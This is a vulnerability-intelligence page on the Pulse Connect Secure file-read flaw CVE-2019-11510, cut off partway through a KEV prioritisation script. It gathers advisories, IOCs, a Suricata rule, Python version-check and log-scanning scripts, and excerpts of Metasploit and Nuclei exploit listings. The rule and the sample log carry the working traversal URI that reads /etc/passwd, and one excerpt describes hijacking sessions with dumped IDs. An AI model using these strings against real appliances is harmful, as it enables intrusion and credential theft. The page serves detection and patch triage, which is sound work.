CVE-2019-11510
Published: 2019-05-08
Priority: P1 (100) · CVSS 3.1 base score 10.0 (critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-05-03
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to exploit an arbitrary file read vulnerability.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ivanti | connect_secure | — | — |
| ivanti | connect_secure | — | — |
| ivanti | connect_secure | — | — |
| ivanti | pulse_connect_secure | — | — |
Detection & IOCs (extracted from sources)
- CVE-2019-11510 exploitation involves sending a specially crafted URI to achieve unauthenticated arbitrary file disclosure on Pulse Connect Secure; monitor for path traversal patterns in HTTP requests targeting PCS appliances.
- Exploitation of CVE-2019-11510 can expose private keys and credentials; post-exploitation activity may include credential harvesting and use of stolen VPN credentials for initial access.
- CVE-2019-11510 has been exploited to install REvil (Sodinokibi) ransomware; detections of post-exploitation ransomware activity should be correlated with Pulse Secure VPN compromise.
- APT29 (SVR) has actively exploited CVE-2019-11510 for initial access; correlate Pulse Secure VPN exploitation with subsequent lateral movement and credential theft TTPs associated with APT29.
- SSL/TLS decryption must be enabled on network security devices to detect exploitation of CVE-2019-11510, because the vulnerability is exploited over HTTPS; an IDS that only sees the encrypted stream cannot match on the URI.
- Iranian threat actors (Fox Kitten campaign) also exploited CVE-2019-11510 in a multi-year campaign targeting IT, telecom, oil and gas, aviation, government, and security sectors; broaden threat actor attribution scope when investigating exploitation.
- Check Point IPS provides detection coverage for CVE-2019-11510 under the signature 'Pulse Connect Secure File Disclosure (CVE-2019-11510)'.
- Despite an official patch being available since disclosure, widespread exploitation of unpatched servers continued well into 2020 and 2021; patch status of Pulse Secure VPN appliances must be verified before assuming protection.
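The last point above (verify patch status before assuming protection) together with the affected trains and fixed builds quoted in the NVD and GHSA descriptions on this page reduces to a version comparison that is easy to get wrong, because Pulse release strings such as 8.3R7.1 do not sort as plain dotted versions. The following Python is an added example, not code from this page or from Ivanti: it parses a PCS release string into a comparable tuple, checks it against the fixed builds stated on this page, and buckets a constructed inventory (hypothetical hostnames) into vulnerable, patched and unknown. The 8.1 boundary follows the GHSA text ("before 8.1R15.1"); the Exploit-DB header lists 8.1R15.1 itself as affected, so confirm that edge against the vendor advisory.

```python
import re

# Fixed builds as stated in the NVD and GHSA descriptions on this page, keyed by
# release train. A build in a covered train that sorts below the fixed build is
# vulnerable. The 8.1 entry follows the GHSA text ("before 8.1R15.1").
FIXED_RELEASES = {
    (8, 1): (8, 1, 15, 1),   # 8.1R15.1
    (8, 2): (8, 2, 12, 1),   # 8.2R12.1
    (8, 3): (8, 3, 7, 1),    # 8.3R7.1
    (9, 0): (9, 0, 3, 4),    # 9.0R3.4
}

# major.minor R release [. maintenance], e.g. "9.0R3.4" or "8.2R12"; trailing
# build text such as " (build 64003)" is ignored.
_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)R(\d+)(?:\.(\d+))?", re.IGNORECASE)


def parse_pcs_version(text):
    """Turn a PCS release string into a (major, minor, release, maintenance)
    tuple so that 8.3R7 < 8.3R7.1 < 8.3R10 compares correctly (plain string
    comparison would put 8.3R10 before 8.3R7). Returns None if unparseable."""
    m = _VERSION_RE.match(text)
    if not m:
        return None
    major, minor, release, maintenance = m.groups()
    return (int(major), int(minor), int(release), int(maintenance or 0))


def is_vulnerable(version):
    """True if the build is in an affected train and below the fixed build,
    False if at or above it, None if the train is not covered by this advisory
    (for example 9.1 and later), which callers must treat as unknown rather
    than safe."""
    parsed = parse_pcs_version(version)
    if parsed is None:
        raise ValueError(f"unrecognised PCS version string: {version!r}")
    fixed = FIXED_RELEASES.get(parsed[:2])
    if fixed is None:
        return None
    return parsed < fixed


def triage(inventory):
    """Bucket (hostname, version) pairs into vulnerable / patched / unknown so
    the vulnerable set can be actioned first. Unparseable strings land in
    'unknown' instead of silently passing as patched."""
    buckets = {"vulnerable": [], "patched": [], "unknown": []}
    for host, version in inventory:
        try:
            state = is_vulnerable(version)
        except ValueError:
            state = None
        if state is None:
            buckets["unknown"].append(host)
        elif state:
            buckets["vulnerable"].append(host)
        else:
            buckets["patched"].append(host)
    return buckets


# Constructed sample inventory; hostnames are hypothetical.
SAMPLE_INVENTORY = [
    ("vpn1.example.test", "8.3R7"),
    ("vpn2.example.test", "9.0R3.4 (build 64003)"),
    ("vpn3.example.test", "9.1R1"),
    ("vpn4.example.test", "8.2R12"),
    ("vpn5.example.test", "unknown"),
]

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{bucket:10s} {', '.join(hosts) or '-'}")
```

Run it over an export of your appliance inventory; anything that lands in "unknown" needs a manual check against the Ivanti advisory rather than being assumed patched, and a build that sorts below the fixed build should be treated as already exposed, not merely at risk, given the exploitation history on this page.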
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 10.0 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| NVD | 3.0 | 9.9 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| VulnCheck | — | 10.0 | CRITICAL | — |
| CISA | — | 10.0 | CRITICAL | — |
GHSA
GHSA-6wr2-qx99-98mg: In Pulse Secure Pulse Connect Secure (PCS) before 8
ghsa_unreviewed · 2022-05-24 · CVE-2019-11510 [HIGH] · CWE-22
In Pulse Secure Pulse Connect Secure (PCS) before 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an authenticated attacker can upload a malicious file to write to arbitrary files, because of Insecure Permissions.
Note that this unreviewed GHSA summary describes an authenticated arbitrary file write, which does not match the NVD, CISA and VulnCheck descriptions of CVE-2019-11510 on this page (an unauthenticated arbitrary file read); rely on those for triage.
VulnCheck
Ivanti Pulse Connect Secure Arbitrary File Read Vulnerability
vulncheck · 2019 · CVSS 10.0 · CVE-2019-11510 [CRITICAL] · CWE-22
Ivanti Pulse Connect Secure contains an arbitrary file read vulnerability that allows an unauthenticated remote attacker with network access via HTTPS to send a specially crafted URI.
Affected: Ivanti Connect Secure and Policy Secure
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://digital.nhs.uk/cyber-alerts/2019/cc-3044; https://www.volexity.com/blog/2019/09/11/vulnerable-private-networks-corporate-vpns-exploited-in-the-wild/; https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities; https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware; https://www.clearskysec.com/wp-content/uploads/2
VulnCheck
Oracle WebLogic Server, Injection
vulncheck · 2019 · CVSS 9.8 · CVE-2019-2725 [CRITICAL] · CWE-74
Injection vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html; https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/; https://digital.nhs.uk/cyber-alerts/2019/cc-3044; https://www.cyber.nj.gov/threat-center/threat-profiles/ransomware-variants/sodinokibi; https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/; https://blog.talosintelligence.com/2019/05/threat-source-may-9-19.html; https://unit42.paloalt
VulnCheck
Microsoft Win32k Privilege Escalation Vulnerability
vulncheck · 2018 · CVSS 7.8 · CVE-2018-8453 [HIGH] · CWE-404
Microsoft Windows Win32k contains a vulnerability that allows an attacker to escalate privileges.
Affected: Microsoft Win32k
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2018-Oct; https://securelist.com/zero-day-in-windows-kernel-transaction-manager-cve-2018-8611/89253/; https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/; https://digital.nhs.uk/cyber-alerts/2019/cc-3044; https://www.cyber.nj.gov/threat-center/threat-profiles/ransomware-variants/sodinokibi; https://web.archive.org/web/20220227045141/https://riskse
CISA
Ivanti Pulse Connect Secure Arbitrary File Read Vulnerability
cisa · 2021-11-03 · CVSS 10.0 · CVE-2019-11510 [CRITICAL] · CWE-22
Affected: Ivanti Pulse Connect Secure
Ivanti Pulse Connect Secure contains an arbitrary file read vulnerability that allows an unauthenticated remote attacker with network access via HTTPS to send a specially crafted URI.
Required Action: Apply updates per vendor instructions.
Notes: Reference CISA's ED 21-03 (https://www.cisa.gov/news-events/directives/ed-21-03-mitigate-pulse-connect-secure-product-vulnerabilities) for further guidance and requirements. Note: The due date for addressing this vulnerability aligns with the requirements outlined in ED 21-03. https://nvd.nist.gov/vuln/detail/CVE-2019-11510
Remediation Due Date: 2022-05-03
Ivanti
Pulse Connect Secure Arbitrary File Read
vendor_ivanti · 2021-11-03 · CVSS 10.0 · CVE-2019-11510 [CRITICAL]
Ivanti Pulse Connect Secure contains an arbitrary file read vulnerability that allows an unauthenticated remote attacker with network access via HTTPS to send a specially crafted URI.
CVE IDs: CVE-2019-11510
Affected products: Pulse Connect Secure
This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
Required Action: Apply updates per vendor instructions.
Remediation Due Date: 2022-05-03
Known to be used in ransomware campaigns.
Suricata
ET EXPLOIT Pulse Secure SSL VPN - Arbitrary File Read (CVE-2019-11510)
suricata · 2019-08-22 · CVSS 10.0 · CVE-2019-11510 [CRITICAL]
Rule (sid 2027904, rev 4):
```
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Pulse Secure SSL VPN - Arbitrary File Read (CVE-2019-11510)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/dana-na/../dana/html5acc/guacamole/../"; startswith; fast_pattern; isdataat:10,relative; reference:url,packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html; reference:cve,CVE-2019-11510; classtype:trojan-activity; sid:2027904; rev:4; metadata:affected_product Pulse_Secure, created_at 2019_08_22, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
```
The rule fires on a client GET whose URI starts with the literal traversal prefix and carries at least ten more bytes after it (isdataat:10,relative). Because it is an anchored prefix match, a request that encodes or rearranges the traversal so that the URI no longer begins with that exact sequence is not covered, and, as noted in the Detection & IOCs list, the sensor must see the decrypted HTTP request for the match to be possible at all.
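As an added example, not part of the ET rule or of the original page, the following Python applies the same match logic offline to web-access-log lines, for the case covered by the decryption caveat in the Detection & IOCs list: the IDS cannot see inside TLS, but the appliance or a TLS-terminating reverse proxy does produce request logs. It reuses the literal prefix from sid:2027904 as an exact-match tier and adds a broader tier that flags any dot-dot traversal under /dana-na/ or /dana/ after percent-decoding, which the anchored signature would miss. The log lines, client addresses and the log format (Apache/nginx combined style) are constructed for the example; the format of your actual appliance or proxy log may differ and the regex should be adjusted to it.

```python
import re
from urllib.parse import unquote

# Literal prefix carried by ET rule sid:2027904 (content + startswith on http.uri).
ET_PREFIX = "/dana-na/../dana/html5acc/guacamole/../"

# Apache/nginx combined-style access log line. The real appliance or proxy log
# format may differ, so adjust this regex to the source you actually have.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_uri(uri):
    """Strip the query string, percent-decode up to three times so %2e%2e and
    double-encoded forms compare equal to a literal '..', fold backslashes to
    slashes and lowercase, so both match tiers work on one canonical form."""
    path = uri.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()


def classify_request(uri):
    """Return a reason tag if the URI looks like CVE-2019-11510 exploitation,
    else None. Tier 1 mirrors the ET signature's exact prefix; tier 2 is
    broader and flags any dot-dot traversal under the /dana-na/ or /dana/
    handlers, which catches shifted or re-encoded variants at the cost of
    some false positives from generic traversal scanners."""
    path = normalise_uri(uri)
    if path.startswith(ET_PREFIX):
        return "et-2027904-prefix"
    if path.startswith(("/dana-na/", "/dana/")) and "/../" in path:
        return "dana-traversal"
    return None


def scan_log(lines):
    """Parse access-log lines and return one hit per suspicious request with
    the client IP, raw URI, HTTP status and the tier that fired. Lines that do
    not parse are skipped rather than raising, so a noisy file still scans."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        reason = classify_request(m["uri"])
        if reason:
            hits.append({"ip": m["ip"], "uri": m["uri"],
                         "status": int(m["status"]), "reason": reason})
    return hits


# Constructed sample log (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.10 - - [21/Aug/2019:10:00:00 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5123',
    '203.0.113.10 - - [21/Aug/2019:10:00:02 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../etc/passwd HTTP/1.1" 200 1844',
    '198.51.100.7 - - [21/Aug/2019:10:01:00 +0000] "GET /dana-na/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 404 162',
    '192.0.2.5 - - [21/Aug/2019:10:02:00 +0000] "GET /dana/home/index.cgi HTTP/1.1" 302 0',
    'not a log line',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']:15s} {hit['status']} {hit['reason']:18s} {hit['uri']}")
```

Tier-2 hits need triage by status code and response size, since any scanner probing for traversal will trip them. A tier-1 hit with a 200 response should be treated as a successful read: per the IOC list above, assume private keys, credentials and session IDs on the appliance are exposed and act accordingly.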
Exploit-DB
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)
exploitdb · 2019-08-21 · CVSS 10.0 · CVE-2019-11510 [CRITICAL]
Module header as published (the listing is truncated after 'References'):
```ruby
# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 8/20/2019
# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: Linux
# CVE : CVE-2019-11510
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Pulse Secure - System file leak',
      'Description' => %q{
        Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
        This exploit reads /etc/passwd as a proof of concept.
        This vulnerability affects 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.
      },
      'References'
```
Nuclei
Pulse Connect Secure SSL VPN Arbitrary File Read
nuclei · CVSS 10.0 · CVE-2019-11510 [CRITICAL]
Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.
Template (truncated in the source):
```yaml
id: CVE-2019-11510

info:
  name: Pulse Connect Secure SSL VPN Arbitrary File Read
  author: organiccrap
  severity: critical
  description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.
  impact: |
    An attacker can access sensitive information stored on the system, po
```
Metasploit
Pulse Secure VPN Arbitrary File Disclosure
metasploit
This module exploits a pre-auth directory traversal in the Pulse Secure VPN server to dump an arbitrary file. Dumped files are stored in loot. If the "Automatic" action is set, plaintext and hashed credentials, as well as session IDs, will be dumped. Valid sessions can be hijacked by setting the "DSIG" browser cookie to a valid session ID. For the "Manual" action, please specify a file to dump via the "FILE" option. /etc/passwd will be dumped by default. If the "PRINT" option is set, file contents will be printed to the screen, with any unprintable characters replaced by a period. Please see related module exploit/linux/http/pulse_secure_cmd_exec for a post-auth exploit that can leverage the results from this module.
Tenable
Frequently Asked Questions About Iranian Cyber Operations
blogs_tenable·2025-06-27
Qualys
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations
blogs_qualys·2025-05-08
## Table of Contents
Who is LockBit? How it Evolved and Operates
Monero: The Coin of the Realm
Patch or Mitigate Now: Critical CVEs Exploited by LockBit
Beyond Traditional Endpoints: Other Compromised Systems
Initial Access and Deployment
Conclusion
The LockBit ransomware gang recently suffered a significant data breach. Their dark web affiliate panels were defaced with the message “Don’t do crime CRIME IS BAD xoxo from Prague,” linking to a MySQL database dump. This archive contains a SQL file from LockBit’s affiliate panel database that includes twenty tables, notably including a ‘btc_addresses’ table with 59,975 unique bitcoin addresses and a ‘chats’ table containing over 4,400 victim negotiation messages from December 2024 to the end of April 2025.
This blog post will leverage
Bleepingcomputer
US indicts Black Kingdom ransomware admin for Microsoft Exchange attacks
blogs_bleepingcomputer · 2025-05-02 · CVSS 10.0 [CRITICAL]
By: Bill Toulas
"When the malware was successful, the ransomware then created a ransom note on the victim's system that directed the victim to send $10,000 worth of Bitcoin to a cryptocurrency address controlled by a co-conspirator and to send proof of this payment to a Black Kingdom email address," reads another part of the announcement.
The U.S. DoJ highlights that Ahmed designed Black Kingdom ransomware to exploit a vulnerability in Microsoft Exchange for initial access to targeted computers.
This was first reported in March 2021 by researcher Marcus Hutchins , who discovered web shells deployed by Black Kingdom ransomware operators on Exchange servers vulnerable to ProxyLogon attacks.
The ProxyLogon flaw re
Tenable
CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
blogs_tenable·2025-01-14·CVSS 9.8
Tenable
CVE-2025-0282: Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
blogs_tenable·2025-01-08·CVSS 9.0
Tenable
CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
blogs_tenable·2024-02-09·CVSS 9.8
Tenable
CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways
blogs_tenable·2024-01-10·CVSS 8.2
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
Qualys
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
blogs_qualys·2023-07-18
## Table of Contents
Top Ten Vulnerabilities Exploited by Threat Actors
Top Ten Highly Active Threat Actors
Top Ten Most Exploited Vulnerabilities by Malware
Top Ten Most Active Malware
Top Ten Vulnerabilities Exploited by Ransomware
Prioritizing Exploited Vulnerabilities with the Qualys VMDR and TruRisk
Assess Your Organizations Exposure to Risk / TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributor
The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of
Sentinelone
NetWalker
blogs_sentinelone·2022-11-30
Sentinelone
REvil
blogs_sentinelone·2022-11-30
Sentinelone
Maze
blogs_sentinelone·2022-11-30
Trendmicro
Security Gaps in Home Workplaces (original title: Lücken in der Sicherheit von Heimarbeitsplätzen)
blogs_trendmicro·2022-10-19
Malware
Remote and hybrid workplaces are now the norm. We analysed the risks and threats they face and give companies detailed recommendations on how to secure these distributed workforces.
By: Trend Micro, Oct 19, 2022
Companies are now either returning to office work, switching permanently to remote work, or opting for a combination of the two. Each of these options has its advantages and disadvantages, but from a cybersecurity standpoint the latter two bring some challenges with them and draw attention to security gaps.
In the case of hybrid and home workplaces (work-from-home, WFH), employees no longer enjoy the
Qualys
NSA Alert: Topmost CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors
blogs_qualys · 2022-10-07 · CVSS 10.0 [CRITICAL]
## Table of Contents
Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0
Identify Vulnerable Assets using Qualys Threat Protection
Recommendations & Mitigations
Contributors
On October 6, 2022, the United States National Security Agency (NSA) released a cybersecurity advisory on the Chinese government—officially known as the People’s Republic of China (PRC) states-sponsored cyber actors’ activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People’s Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and I
Tenable
Top 20 CVEs Exploited by People's Republic of China State-Sponsored Actors (AA22-279A)
blogs_tenable·2022-10-07
Trendmicro
Cloud Native: Virtual Patching 101
blogs_trendmicro·2022-06-16·CVSS 10.0
Learn about the challenges faced when implementing a vulnerability and patch management policy and how cloud-native virtual patching can help.
By: Duane Seon, Jun 16, 2022
As an enterprise’s online infrastructures become more complex — from their decentralization to the adoption of cloud , mobile , and internet-of-things (IoT) technologies — patch management has become an even more time-consuming and resource-intensive task. However, delaying or deferring the application of patches can be risky. Breaches could result in millions of dollars in financial losses , not to mention the hefty fines paid to authorities.
Besides data breaches, there’s also the looming threat of ransomware and targeted campaigns ab
Qualys
CISA Alert: Top 15 Routinely Exploited Vulnerabilities
blogs_qualys·2022-05-06·CVSS 10.0
[CRITICAL] CISA Alert: Top 15 Routinely Exploited Vulnerabilities
## Table of Contents
CISA's Top 15 Routinely Exploited Vulnerabilities of 2021
Highlights of Top Vulnerabilities Cited in CISA 2021 Report
Log4Shell Vulnerability
ProxyShell: Multiple Vulnerabilities
ProxyLogon: Multiple Vulnerabilities
How Can Qualys Help?
Getting Started
The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment.
The Cybersecurity & Infrastructure Security Agency (CISA) releases detailed alerts of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights in
Sentinelone
Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
blogs_sentinelone·2022-04-28·CVSS 9.8
[CRITICAL] Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
From remote code execution and privilege escalation to security bypasses and path traversal, software vulnerabilities are a threat actor’s stock-in-trade for initial access and compromise. In the past 12 months, we’ve seen a number of new flaws, including Log4Shell, ProxyShell, and ProxyLogon, being exploited in attacks against enterprises. These and other known bugs, some revealed as far back as 2017, continue to be routinely abused in environments where organizations have failed to properly inventory and patch. As CISA released its latest update on the most commonly exploited vulnerabilities, we take a look at each of the top 15 most routinely exploited bugs being used against businesses today.
## 1. Log4Shell (CVE-2021-44228)
Occupying top spot is the notorious flaw in the Apache Java
Qualys
Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines
blogs_qualys·2022-02-26
Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines
## Table of Contents
Protecting Customer Data on Qualys Cloud Platform
Urgent: Assess and Heighten Your Security Posture
Step 1: Monitor Your Shodan/Internet-Exposed Assets
Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities
Step 3: Protect Your Cloud Services and Office 365
Step 4: Continuously Detect any Potential Threats and Attacks
Take Action to Learn More about How to Strengthen Your Defenses
CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA’s recommendations.
With the invasion of Ukraine by Russia, the U.
Tenable
Government Advisories Warn of APT Activity Resulting from Russian Invasion of Ukraine
blogs_tenable·2022-02-24
Government Advisories Warn of APT Activity Resulting from Russian Invasion of Ukraine
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
blogs_unit42·2022-02-22
Russia-Ukraine Cyberattacks (Updated): How to Protect Against Related Cyberthreats Including DDoS, HermeticWiper, Gamaredon, Website Defacement, Phishing and Scams
## Executive Summary
Over the past several weeks, Russia-Ukraine cyber activity has escalated substantially. Beginning on Feb. 15, a series of distributed denial of service (DDoS) attacks commenced. These attacks have continued over the past week, impacting both the Ukrainian government and banking institutions. On Feb. 23, a new variant of wiper malware named HermeticWiper was discovered in Ukraine. Shortly after, a new round of website defacement attacks were also observed impacting Ukrainian government organizations.
Consistent with our previous reporting on the topic, several western governments have issued recommendations for their populations to prepare for cyberattacks that could disrupt, disable or destroy critical infrastructure. We have already observed an increase in Russian c
Qualys
Qualys Response to CISA Alert: Binding Operational Directive 22-01
blogs_qualys·2021-11-09
Qualys Response to CISA Alert: Binding Operational Directive 22-01
## Table of Contents
Overview
Directive Scope
CISA Catalog of Known Exploited Vulnerabilities
Detect CISA's Vulnerabilities Using Qualys VMDR
Remediation
Federal Enterprises and Agencies Can Act Now
Summary
Getting Started
## Overview
On November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directive 22-01 , “Reducing the Significant Risk of Known Exploited Vulnerabilities.” This directive recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate
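The BOD 22-01 overview above and the earlier Qualys note on managing the KEV catalog both come down to one operational task: join the scanner's CVE findings against CISA's catalog, then work the matches in due-date order, with past-due and ransomware-linked entries first. The script below is an added example of that join; it is not code from Qualys, Tenable or CISA. The catalog excerpt and the asset findings embedded in it are constructed sample data that follow the published KEV field names (cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse); the CVE IDs ending in 9999x are placeholders for non-KEV findings, and the fixed TODAY value exists only so the output is reproducible. In practice the catalog text comes from CISA's known_exploited_vulnerabilities.json feed and the findings from your own scanner export.

```python
"""Prioritise scanner findings against the CISA KEV catalog (added example).

The catalog excerpt and the findings below are constructed sample data in the
shape of the real inputs; swap in CISA's JSON feed and your scanner's export.
"""
from __future__ import annotations

import json
from collections.abc import Iterable
from dataclasses import dataclass
from datetime import date

# Constructed excerpt in the shape of CISA's KEV JSON feed. Field names follow the
# published schema; the values are sample data for this demo, not the live catalog.
KEV_JSON = """
{
  "title": "KEV catalog (constructed excerpt)",
  "vulnerabilities": [
    {"cveID": "CVE-2019-11510", "vendorProject": "Pulse Secure", "product": "Pulse Connect Secure",
     "dateAdded": "2021-11-03", "dueDate": "2022-05-03", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2021-22893", "vendorProject": "Pulse Secure", "product": "Pulse Connect Secure",
     "dateAdded": "2021-11-03", "dueDate": "2021-11-17", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2021-27065", "vendorProject": "Microsoft", "product": "Exchange Server",
     "dateAdded": "2021-11-03", "dueDate": "2021-11-17", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
     "dateAdded": "2021-12-10", "dueDate": "2021-12-24", "knownRansomwareCampaignUse": "Known"}
  ]
}
"""

# Constructed scanner output: (asset, CVE) pairs as a VM tool might export them.
FINDINGS = [
    ("vpn-gw-01", "CVE-2019-11510"),
    ("vpn-gw-01", "CVE-2021-22893"),
    ("mail-01", "CVE-2021-27065"),
    ("app-07", "CVE-2021-44228"),
    ("app-07", "CVE-2020-99999"),    # placeholder ID, not in KEV: normal patch cycle
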